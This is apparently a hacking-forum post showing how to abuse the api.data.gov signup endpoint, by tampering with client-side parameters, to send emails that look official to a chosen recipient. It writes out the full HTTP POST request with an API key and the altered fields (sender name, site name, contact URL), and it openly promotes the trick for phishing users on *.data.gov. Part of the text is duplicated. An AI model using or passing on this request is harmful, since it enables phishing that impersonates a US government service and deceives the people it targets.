In this thread I will discussion how I was able to customize emails from api.data.gov and send it to a user of my choice. Credit to pom for giving me the idea.
Below is the request that I stumbled across on open.gsa.gov/api/regulationsgov/
By inspecting the page we can see all the default values
Turns out all the values are able to be changed in the request on the clients side so that is what I did.
Some issue that I came across was the limit on the first_name parameter, meaning the contents of the email was limited. I was able to bypass this limit restriction using another paramter.
This is a cool method of inboxing phishing emails for example if i was targeting someone on *.data.gov i could craft this fully legit email.
Below is the request that I stumbled across on open.gsa.gov/api/regulationsgov/
Код:
POST /api-umbrella/v1/users.json?api_key=E41mzkIX0ZReJvQbcSFtqhckpqFnTtkcsjFWAx1Z HTTP/1.1
Host: api.data.gov
Content-Length: 521
Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: rnd
Origin: https://open.gsa.gov
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://open.gsa.gov/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
user[first_name]=test&user[last_name]=test&user[email]=test@yopmail.com&user[website]=doxbin.co.uk&user[use_description]=test&user[terms_and_conditions]=1&user[registration_source]=gsa-regulations&options[example_api_url]=&options[contact_url]=https://beta.regulations.gov/support&options[site_name]=Regulations.gov+API&options[send_welcome_email]=true&options[email_from_name]=eRulemaking+Help+Desk&options[email_from_address]=&options[verify_email]=trueBy inspecting the page we can see all the default values
Turns out all the values are able to be changed in the request on the clients side so that is what I did.
Some issue that I came across was the limit on the first_name parameter, meaning the contents of the email was limited. I was able to bypass this limit restriction using another paramter.
This is a cool method of inboxing phishing emails for example if i was targeting someone on *.data.gov i could craft this fully legit email.
Последнее редактирование:
